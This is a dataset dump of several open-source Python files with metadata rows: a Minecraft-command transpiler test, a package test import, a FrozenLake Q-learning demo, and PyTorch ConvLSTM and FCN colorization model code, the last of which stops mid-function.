| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
ead0a7af66b46fcc37a136760f849a0280dccce6
| 987
|
py
|
Python
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 2
|
2017-07-04T02:27:11.000Z
|
2017-07-08T10:39:54.000Z
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 6
|
2018-07-07T11:58:15.000Z
|
2018-07-07T13:01:49.000Z
|
test_fena/v1_13/test_xps.py
|
Aquafina-water-bottle/Fena
|
00a2b1dbc6f8abd968c46c637d6ad30d5fcde919
|
[
"MIT"
] | 1
|
2017-07-24T23:52:43.000Z
|
2017-07-24T23:52:43.000Z
|
from test_fena.test_common import test_cmd
def test_xps():
test_cmd("xp @s + 5", "xp add @s 5 points")
test_cmd("xp @s - 5", "xp add @s -5 points")
test_cmd("xp @s = 5", "xp set @s 5 points")
test_cmd("xp @s + 0", "xp add @s 0 points")
test_cmd("xp @s - 0", "xp add @s -0 points")
test_cmd("xp @s = 0", "xp set @s 0 points")
test_cmd("xp @s + -10", expect_error=True)
test_cmd("xp @s - -10", expect_error=True)
test_cmd("xp @s = -10", expect_error=True)
test_cmd("xp @s + 5 points", "xp add @s 5 points")
test_cmd("xp @s - 5 points", "xp add @s -5 points")
test_cmd("xp @s = 5 points", "xp set @s 5 points")
test_cmd("xp @s + 5 levels", "xp add @s 5 levels")
test_cmd("xp @s - 5 levels", "xp add @s -5 levels")
test_cmd("xp @s = 5 levels", "xp set @s 5 levels")
test_cmd("xp @s <- points", "xp get @s points")
test_cmd("xp @s <- levels", "xp get @s levels")
test_cmd("xp @s <- invalid", expect_error=True)
| 35.25
| 55
| 0.571429
| 187
| 987
| 2.877005
| 0.117647
| 0.247212
| 0.301115
| 0.334572
| 0.819703
| 0.760223
| 0.760223
| 0.711896
| 0.711896
| 0.682156
| 0
| 0.04
| 0.240122
| 987
| 27
| 56
| 36.555556
| 0.677333
| 0
| 0
| 0
| 0
| 0
| 0.48783
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| true
| 0
| 0.05
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
dc3b9f59a4f114a7cd7a370a341647b4f1412603
| 86
|
py
|
Python
|
brackets/tests/__init__.py
|
pouya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 16
|
2019-01-02T16:03:47.000Z
|
2022-02-12T16:39:40.000Z
|
brackets/tests/__init__.py
|
pooya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 2
|
2018-01-25T22:58:26.000Z
|
2018-01-25T23:29:36.000Z
|
brackets/tests/__init__.py
|
pooya-eghbali/brackets
|
09cf908df7e00f84408cdf783373a2d864cad8cc
|
[
"BSD-3-Clause"
] | 2
|
2018-01-26T02:20:05.000Z
|
2018-05-16T17:13:24.000Z
|
import brackets
import brackets.tests.with_codecs
import brackets.tests.with_importer
| 21.5
| 35
| 0.883721
| 12
| 86
| 6.166667
| 0.5
| 0.567568
| 0.513514
| 0.621622
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 86
| 3
| 36
| 28.666667
| 0.925
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
dc7b93143693f193d79cde14b3dcefa98f6401ec
| 2,873
|
py
|
Python
|
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
demos/lake.py
|
SmartDataAnalytics/HSP-RL
|
9ba634f1410d067dc5fee88b1b13ced1e3bb508a
|
[
"Apache-2.0"
] | null | null | null |
import gym
import sys
import numpy as np
import tensorflow as tf
from gym.envs.registration import register
'''
------------------------- TESTS (Gym framework) -------------------------
'''
env = gym.make('FrozenLake-v0')
env.seed(0)
np.random.seed(56776)
print(env.observation_space)
print(env.action_space)
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
print(q_learning_table)
print(env.render())
s = env.reset()
env.step(0)
env.render()
print('---------')
s = env.reset()
env.step(1)
env.render()
print('---------')
s = env.reset()
env.step(2)
env.render()
print('---------')
s = env.reset()
env.step(3)
env.render()
print('---------')
exit(0)
env = gym.make('FrozenLakeNotSlippery-v0')
env.seed(0)
np.random.seed(56776)
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
# -- hyper --
num_epis = 5000
num_iter = 2000
learning_rate = 0.3
discount = 0.8
# -- training the agent ----
for epis in range(num_epis):
state = env.reset()
for iter in range(num_iter):
action = np.argmax(q_learning_table[state, :] + np.random.randn(1, 4))
state_new, reward, done, _ = env.step(action)
q_learning_table[state, action] = (1 - learning_rate) * q_learning_table[state, action] + \
learning_rate * (reward + discount * np.max(q_learning_table[state_new, :]))
state = state_new
if done: break
print(np.argmax(q_learning_table, axis=1))
print(np.around(q_learning_table, 6))
print('-------------------------------')
# visualize no uncertainty
s = env.reset()
for _ in range(100):
action = np.argmax(q_learning_table[s, :])
state_new, _, done, _ = env.step(action)
env.render()
s = state_new
if done: break
print('-------------------------------')
env = gym.make('FrozenLake-v0')
env.seed(0)
np.random.seed(56776)
q_learning_table = np.zeros([env.observation_space.n, env.action_space.n])
# -- hyper --
num_epis = 500
num_iter = 200
learning_rate = 0.3
discount = 0.8
# -- training the agent ----
for epis in range(num_epis):
state = env.reset()
for iter in range(num_iter):
action = np.argmax(q_learning_table[state, :] + np.random.randn(1, 4))
state_new, reward, done, _ = env.step(action)
q_learning_table[state, action] = (1 - learning_rate) * q_learning_table[state, action] + \
learning_rate * (reward + discount * np.max(q_learning_table[state_new, :]))
state = state_new
if done: break
print(np.argmax(q_learning_table, axis=1))
print(np.around(q_learning_table, 6))
print('-------------------------------')
s = env.reset()
for _ in range(100):
action = np.argmax(q_learning_table[s, :])
state_new, _, done, _ = env.step(action)
env.render()
s = state_new
if done: break
# -- end code --
| 26.118182
| 118
| 0.613296
| 405
| 2,873
| 4.162963
| 0.187654
| 0.096085
| 0.149466
| 0.090154
| 0.825623
| 0.816133
| 0.813167
| 0.813167
| 0.759786
| 0.759786
| 0
| 0.027269
| 0.183084
| 2,873
| 109
| 119
| 26.357798
| 0.691095
| 0.040724
| 0
| 0.776471
| 0
| 0
| 0.067142
| 0.043886
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dc859f8593b46a157af464459e2b21b728d85a7e
| 15,584
|
py
|
Python
|
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | 1
|
2021-06-25T13:32:16.000Z
|
2021-06-25T13:32:16.000Z
|
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | null | null | null |
models/rnnmodule.py
|
shaochangxu/UMT-MVSNet
|
d502b9f28ae052186b9a92fc0ccd8c8709effd28
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch
import numpy as np
from .convlstm import *
from .submodule import *
#from module import *
class FeatNet(nn.Module):
def __init__(self, gn):
super(FeatNet, self).__init__()
base_filter = 8
self.conv0_0 = convgnrelu(3, base_filter * 2, kernel_size=3, stride=1, dilation=1)
self.conv0_1 = convgnrelu(base_filter * 2, base_filter * 4, kernel_size=3, stride=1, dilation=1)
self.conv0_2 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=2)
self.conv0_3 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=1)
# conv1_2 with conv0_2
self.conv1_1 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=3)
self.conv1_2 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=1)
# conv2_2 with conv0_2
self.conv2_1 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=4)
self.conv2_2 = convgnrelu(base_filter * 4, base_filter * 4, kernel_size=3, stride=1, dilation=1)
# with concat conv0_3, conv1_2, conv2_2
self.conv = nn.Conv2d(base_filter * 12, base_filter*4, 3, 1, 1)
def forward(self, x):
conv0_0 = self.conv0_0(x)
conv0_1 = self.conv0_1(conv0_0)
conv0_2 = self.conv0_2(conv0_1)
conv0_3 = self.conv0_3(conv0_2)
conv1_2 = self.conv1_2(self.conv1_1(conv0_2))
conv2_2 = self.conv2_2(self.conv2_1(conv0_2))
conv = self.conv(torch.cat([conv0_3, conv1_2, conv2_2], 1))
return conv
class UNetConvLSTMV4(nn.Module):
def __init__(self, input_size, input_dim, hidden_dim, kernel_size, num_layers,
batch_first=False, bias=True, return_all_layers=False, gn=True):
super(UNetConvLSTMV4, self).__init__()
self._check_kernel_size_consistency(kernel_size)
# Make sure that both `kernel_size` and `hidden_dim` are lists having len == num_layers
kernel_size = self._extend_for_multilayer(kernel_size, num_layers)
hidden_dim = self._extend_for_multilayer(hidden_dim, num_layers)
if not len(kernel_size) == len(hidden_dim) == num_layers:
raise ValueError('Inconsistent list length.')
self.height, self.width = input_size #feature: height, width)
self.gn = gn
print('Training Phase in UNetConvLSTM: {}, {}, gn: {}'.format(self.height, self.width, self.gn))
self.input_dim = input_dim # input channel
self.hidden_dim = hidden_dim # output channel [16, 16, 16, 16, 16, 8]
self.kernel_size = kernel_size # kernel size [[3, 3]*5]
self.num_layers = num_layers # Unet layer size: must be odd
self.batch_first = batch_first # TRUE
self.bias = bias #
self.return_all_layers = return_all_layers
#assert self.num_layers % 2 == 1 # Even
self.down_num = (self.num_layers+1) / 2
# redefine four UNet-LSTM
# GPU Memory: 8033MiB
cell_list = []
assert self.num_layers % 2 == 1 # num_layers == 7
self.down_num = (self.num_layers+1) / 2
# use GN
for i in range(0, self.num_layers):
#cur_input_dim = self.input_dim if i == 0 else self.hidden_dim[i-1]
scale = 2**i if i < self.down_num else 2**(self.num_layers-i-1)
cell_list.append(ConvGnLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
#cell_list.append(ConvLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
input_dim=self.input_dim[i],
hidden_dim=self.hidden_dim[i],
kernel_size=self.kernel_size[i],
bias=self.bias))
self.cell_list = nn.ModuleList(cell_list)
self.deconv_0 = deConvGnReLU(
16,
16, #16
kernel_size=3,
stride=2,
padding=1,
bias=self.bias,
output_padding=1
)
self.deconv_1 = deConvGnReLU(
16,
16, #16
kernel_size=3,
stride=2,
padding=1,
bias=self.bias,
output_padding=1
)
# add one more deeper network
self.deconv_2 = deConvGnReLU(
16,
16, #16
kernel_size=3,
stride=2,
padding=1,
bias=self.bias,
output_padding=1
)
self.conv_0 = nn.Conv2d(8, 1, 3, 1, padding=1)
def forward(self, input_tensor, hidden_state=None, idx = 0, process_sq=True):
"""
Parameters
----------
input_tensor: todo
5-D Tensor either of shape (t, b, c, h, w) or (b, t, c, h, w)
hidden_state: todo
None. todo implement stateful
Returns
-------
last_state_list, layer_output
"""
if idx ==0 : # input the first layer of input image
hidden_state = self._init_hidden(batch_size=input_tensor.size(0))
layer_output_list = []
last_state_list = []
seq_len = input_tensor.size(1)
cur_layer_input = input_tensor
if process_sq:
#Encoder
#print(torch.sum(self.hidden_state[0][0]==0))
h0, c0 = hidden_state[0]= self.cell_list[0](input_tensor=cur_layer_input,
cur_state=hidden_state[0])
#self.hidden_state[0] = (h0, c0)
h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
h1, c1 = hidden_state[1] = self.cell_list[1](input_tensor=h0_1,
cur_state=hidden_state[1])
#self.hidden_state[1] = (h1, c1)
h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
h2, c2 = hidden_state[2] = self.cell_list[2](input_tensor=h1_0,
cur_state=hidden_state[2])
h2_0 = nn.MaxPool2d((2, 2), stride=2)(h2)
h3, c3 = hidden_state[3] = self.cell_list[3](input_tensor=h2_0,
cur_state=hidden_state[3])
# Decoder
#self.hidden_state[2] = (h2, c2)
h3_0 = self.deconv_0(h3) # auto reuse
h3_1 = torch.cat([h3_0, h2], 1)
h4, c4 = hidden_state[4] = self.cell_list[4](input_tensor=h3_1,
cur_state=hidden_state[4])
#self.hidden_state[3] = (h3, c3)
h4_0 = self.deconv_1(h4) # auto reuse
h4_1 = torch.cat([h4_0, h1], 1)
h5, c5 = hidden_state[5] = self.cell_list[5](input_tensor=h4_1,
cur_state=hidden_state[5])
#self.hidden_state[3] = (h3, c3)
h5_0 = self.deconv_2(h5) # auto reuse
h5_1 = torch.cat([h5_0, h0], 1)
h6, c6 = hidden_state[6] = self.cell_list[6](input_tensor=h5_1,
cur_state=hidden_state[6])
#self.hidden_state[4] = (h4, c4)
cost = self.conv_0(h6) # auto reuse
#cost = F.tanh(cost)
# output cost
return cost, hidden_state
def _init_hidden(self, batch_size):
init_states = []
for i in range(self.num_layers):
init_states.append(self.cell_list[i].init_hidden(batch_size))
return init_states
@staticmethod
def _check_kernel_size_consistency(kernel_size):
if not (isinstance(kernel_size, tuple) or
(isinstance(kernel_size, list) and all([isinstance(elem, tuple) for elem in kernel_size]))):
raise ValueError('`kernel_size` must be tuple or list of tuples')
@staticmethod
def _extend_for_multilayer(param, num_layers):
if not isinstance(param, list):
param = [param] * num_layers
return param
# input 3D Feature Volume
class UNetConvLSTM(nn.Module): # input 3D feature volume
def __init__(self, input_size, input_dim, hidden_dim, kernel_size, num_layers,
batch_first=False, bias=True, return_all_layers=False, gn=True):
super(UNetConvLSTM, self).__init__()
self._check_kernel_size_consistency(kernel_size)
# Make sure that both `kernel_size` and `hidden_dim` are lists having len == num_layers
kernel_size = self._extend_for_multilayer(kernel_size, num_layers)
hidden_dim = self._extend_for_multilayer(hidden_dim, num_layers)
if not len(kernel_size) == len(hidden_dim) == num_layers:
raise ValueError('Inconsistent list length.')
self.height, self.width = input_size #feature: height, width)
self.gn = gn
print('Training Phase in UNetConvLSTM: {}, {}, gn: {}'.format(self.height, self.width, self.gn))
self.input_dim = input_dim # input channel
self.hidden_dim = hidden_dim # output channel [16, 16, 16, 16, 16, 8]
self.kernel_size = kernel_size # kernel size [[3, 3]*5]
self.num_layers = num_layers # Unet layer size: must be odd
self.batch_first = batch_first # TRUE
self.bias = bias #
self.return_all_layers = return_all_layers
cell_list = []
#assert self.num_layers % 2 == 1 # Even
self.down_num = (self.num_layers+1) / 2
# use GN
for i in range(0, self.num_layers):
#cur_input_dim = self.input_dim if i == 0 else self.hidden_dim[i-1]
scale = 2**i if i < self.down_num else 2**(self.num_layers-i-1)
#cell_list.append(ConvGnLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
cell_list.append(ConvLSTMCell(input_size=(int(self.height/scale), int(self.width/scale)),
input_dim=self.input_dim[i],
hidden_dim=self.hidden_dim[i],
kernel_size=self.kernel_size[i],
bias=self.bias))
self.cell_list = nn.ModuleList(cell_list)
self.deconv_0 = deConvGnReLU(
16,
16, #16
kernel_size=3,
stride=2,
padding=1,
bias=self.bias,
output_padding=1
)
self.deconv_1 = deConvGnReLU(
16,
16, #16
kernel_size=3,
stride=2,
padding=1,
bias=self.bias,
output_padding=1
)
self.conv_0 = nn.Conv2d(8, 1, 3, 1, padding=1)
def forward(self, input_tensor, hidden_state=None, idx = 0, process_sq=True):
"""
Parameters
----------
input_tensor: todo
5-D Tensor either of shape (t, b, c, h, w) or (b, t, c, h, w)
hidden_state: todo
None. todo implement stateful
Returns
-------
last_state_list, layer_output
"""
if idx ==0 : # input the first layer of input image
hidden_state = self._init_hidden(batch_size=input_tensor.size(0))
layer_output_list = []
last_state_list = []
seq_len = input_tensor.size(1)
cur_layer_input = input_tensor
if process_sq:
#print(torch.sum(self.hidden_state[0][0]==0))
h0, c0 = hidden_state[0]= self.cell_list[0](input_tensor=cur_layer_input,
cur_state=hidden_state[0])
#self.hidden_state[0] = (h0, c0)
h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
h1, c1 = hidden_state[1] = self.cell_list[1](input_tensor=h0_1,
cur_state=hidden_state[1])
#self.hidden_state[1] = (h1, c1)
h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
h2, c2 = hidden_state[2] = self.cell_list[2](input_tensor=h1_0,
cur_state=hidden_state[2])
#self.hidden_state[2] = (h2, c2)
h2_0 = self.deconv_0(h2) # auto reuse
h2_1 = torch.cat([h2_0, h1], 1)
h3, c3 = hidden_state[3] = self.cell_list[3](input_tensor=h2_1,
cur_state=hidden_state[3])
#self.hidden_state[3] = (h3, c3)
h3_0 = self.deconv_1(h3) # auto reuse
h3_1 = torch.cat([h3_0, h0], 1)
h4, c4 = hidden_state[4] = self.cell_list[4](input_tensor=h3_1,
cur_state=hidden_state[4])
#self.hidden_state[4] = (h4, c4)
cost = self.conv_0(h4) # auto reuse
#cost = F.tanh(cost)
# output cost
return cost, hidden_state
else:
for t in range(seq_len):
#if t == 0:
h0, c0 = self.cell_list[0](input_tensor=cur_layer_input[:, t, :, :, :],
cur_state=hidden_state[0])
hidden_state[0] = [h0, c0]
h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
h1, c1 = self.cell_list[1](input_tensor=h0_1,
cur_state=hidden_state[1])
hidden_state[1] = [h1, c1]
h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
h2, c2 = self.cell_list[2](input_tensor=h1_0,
cur_state=hidden_state[2])
hidden_state[2] = [h2, c2]
h2_0 = self.deconv_0(h2) # auto reuse
h2_1 = torch.concat([h2_0, h1], 1)
h3, c3 = self.cell_list[3](input_tensor=h2_1,
cur_state=hidden_state[3])
hidden_state[3] = [h3, c3]
h3_0 = self.deconv_1(h3) # auto reuse
h3_1 = torch.concat([h3_0, h0], 1)
h4, c4 = self.cell_list[4](input_tensor=h3_1,
cur_state=hidden_state[4])
hidden_state[4] = [h4, c4]
cost = self.conv_0(h4) # auto reuse
cost = nn.Tanh(cost)
# output cost
layer_output_list.append(cost)
prob_volume = torch.stack(layer_output_list, dim=1)
#prob_volume = nn.Softmax(prob_volume, dim=1)
return prob_volume
def _init_hidden(self, batch_size):
init_states = []
for i in range(self.num_layers):
init_states.append(self.cell_list[i].init_hidden(batch_size))
return init_states
@staticmethod
def _check_kernel_size_consistency(kernel_size):
if not (isinstance(kernel_size, tuple) or
(isinstance(kernel_size, list) and all([isinstance(elem, tuple) for elem in kernel_size]))):
raise ValueError('`kernel_size` must be tuple or list of tuples')
@staticmethod
def _extend_for_multilayer(param, num_layers):
if not isinstance(param, list):
param = [param] * num_layers
return param
| 42.005391
| 112
| 0.536961
| 2,007
| 15,584
| 3.916791
| 0.091679
| 0.076962
| 0.032057
| 0.041089
| 0.864521
| 0.846966
| 0.832082
| 0.829411
| 0.824704
| 0.810329
| 0
| 0.055162
| 0.356712
| 15,584
| 371
| 113
| 42.005391
| 0.728978
| 0.145662
| 0
| 0.705179
| 0
| 0
| 0.017802
| 0
| 0
| 0
| 0
| 0.016173
| 0.003984
| 1
| 0.047809
| false
| 0
| 0.01992
| 0
| 0.111554
| 0.007968
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f4a7cd92cd27b035dd3d7ae0cf7222304b85cca4
| 26,276
|
py
|
Python
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 300
|
2019-01-28T07:37:53.000Z
|
2022-03-09T02:17:28.000Z
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 15
|
2019-04-22T14:23:01.000Z
|
2021-11-24T09:52:32.000Z
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 67
|
2019-01-29T05:42:09.000Z
|
2021-12-28T11:09:44.000Z
|
# import fcn
import os.path as osp
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class NormFeat(nn.Module):
''' L2 normalization of features '''
def __init__(self, scale_factor=1.0):
super(NormFeat, self).__init__()
self.scale_factor = scale_factor
def forward(self, input):
return self.scale_factor * F.normalize(input, p=2, dim=1)
class ScaleFeat(nn.Module):
# https://discuss.pytorch.org/t/is-scale-layer-available-in-pytorch/7954/6?u=arunirc
def __init__(self, scale_factor=50.0):
super().__init__()
self.scale = scale_factor
def forward(self, input):
return input * self.scale
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsampling_weight(in_channels, out_channels, kernel_size):
"""Make a 2D bilinear kernel suitable for upsampling"""
factor = (kernel_size + 1) // 2
if kernel_size % 2 == 1:
center = factor - 1
else:
center = factor - 0.5
og = np.ogrid[:kernel_size, :kernel_size]
filt = (1 - abs(og[0] - center) / factor) * \
(1 - abs(og[1] - center) / factor)
weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
dtype=np.float64)
weight[range(in_channels), range(out_channels), :, :] = filt
return torch.from_numpy(weight).float()
class FCN32sColor(nn.Module):
def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
super(FCN32sColor, self).__init__()
self.n_class = n_class
self.bin_type = bin_type
self.batch_norm = batch_norm
# conv1
self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
self.relu1_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_1_bn = nn.BatchNorm2d(64)
self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
self.relu1_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_2_bn = nn.BatchNorm2d(64)
self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/2
# conv2
self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
self.relu2_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_1_bn = nn.BatchNorm2d(128)
self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
self.relu2_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_2_bn = nn.BatchNorm2d(128)
self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/4
# conv3
self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
self.relu3_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_1_bn = nn.BatchNorm2d(256)
self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_2_bn = nn.BatchNorm2d(256)
self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_3_bn = nn.BatchNorm2d(256)
self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/8
# conv4
self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
self.relu4_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_1_bn = nn.BatchNorm2d(512)
self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_2_bn = nn.BatchNorm2d(512)
self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_3_bn = nn.BatchNorm2d(512)
self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/16
# conv5
self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_1_bn = nn.BatchNorm2d(512)
self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_2_bn = nn.BatchNorm2d(512)
self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_3_bn = nn.BatchNorm2d(512)
self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/32
# fc6
self.fc6 = nn.Conv2d(512, 4096, 7)
self.relu6 = nn.ReLU(inplace=True)
if batch_norm:
self.fc6_bn = nn.BatchNorm2d(4096)
self.drop6 = nn.Dropout2d()
# fc7
self.fc7 = nn.Conv2d(4096, 4096, 1)
self.relu7 = nn.ReLU(inplace=True)
self.fc7_bn = nn.BatchNorm2d(4096)
self.drop7 = nn.Dropout2d()
if bin_type == 'one-hot':
# NOTE: *two* output prediction maps for hue and chroma
# TODO - not implemented error should be raised for this!
self.score_fr_hue = nn.Conv2d(4096, n_class, 1)
self.upscore_hue = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
bias=False)
self.score_fr_chroma = nn.Conv2d(4096, n_class, 1)
self.upscore_chroma = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
bias=False)
self.upscore_hue.weight.requires_grad = False
self.upscore_chroma.weight.requires_grad = False
elif bin_type == 'soft':
self.score_fr = nn.Conv2d(4096, n_class, 1)
self.upscore = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
bias=False)
self.upscore.weight.requires_grad = False # fix bilinear upsampler
self._initialize_weights()
# TODO - init from pre-trained network
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
pass # leave the default PyTorch init
if isinstance(m, nn.ConvTranspose2d):
assert m.kernel_size[0] == m.kernel_size[1]
initial_weight = get_upsampling_weight(
m.in_channels, m.out_channels, m.kernel_size[0])
m.weight.data.copy_(initial_weight)
def forward(self, x):
h = x
h = self.conv1_1(h)
if self.batch_norm:
h = self.conv1_1_bn(h)
h = self.relu1_1(h)
h = self.conv1_2(h)
if self.batch_norm:
h = self.conv1_2_bn(h)
h = self.relu1_2(h)
h = self.pool1(h)
if self.batch_norm:
h = self.relu2_1(self.conv2_1_bn(self.conv2_1(h)))
else:
h = self.relu2_1(self.conv2_1(h))
if self.batch_norm:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
else:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
h = self.pool2(h)
if self.batch_norm:
h = self.relu3_1(self.conv3_1_bn(self.conv3_1(h)))
else:
h = self.relu3_1(self.conv3_1(h))
if self.batch_norm:
h = self.relu3_2(self.conv3_2_bn(self.conv3_2(h)))
else:
h = self.relu3_2(self.conv3_2(h))
if self.batch_norm:
h = self.relu3_3(self.conv3_3_bn(self.conv3_3(h)))
else:
h = self.relu3_3(self.conv3_3(h))
h = self.pool3(h)
if self.batch_norm:
h = self.relu4_1(self.conv4_1_bn(self.conv4_1(h)))
else:
h = self.relu4_1(self.conv4_1(h))
if self.batch_norm:
h = self.relu4_2(self.conv4_2_bn(self.conv4_2(h)))
else:
h = self.relu4_2(self.conv4_2(h))
if self.batch_norm:
h = self.relu4_3(self.conv4_3_bn(self.conv4_3(h)))
else:
h = self.relu4_3(self.conv4_3(h))
h = self.pool4(h)
if self.batch_norm:
h = self.relu5_1(self.conv5_1_bn(self.conv5_1(h)))
else:
h = self.relu5_1(self.conv5_1(h))
if self.batch_norm:
h = self.relu5_2(self.conv5_2_bn(self.conv5_2(h)))
else:
h = self.relu5_2(self.conv5_2(h))
if self.batch_norm:
h = self.relu5_3(self.conv5_3_bn(self.conv5_3(h)))
else:
h = self.relu5_3(self.conv5_3(h))
h = self.pool5(h)
if self.batch_norm:
h = self.relu6(self.fc6_bn(self.fc6(h)))
else:
h = self.relu6(self.fc6(h))
h = self.drop6(h)
if self.batch_norm:
h = self.relu7(self.fc7_bn(self.fc7(h)))
else:
h = self.relu7(self.fc7(h))
h = self.drop7(h)
if self.bin_type == 'one-hot':
# hue prediction map
h_hue = self.score_fr_hue(h)
h_hue = self.upscore_hue(h_hue)
h_hue = h_hue[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
# chroma prediction map
h_chroma = self.score_fr_chroma(h)
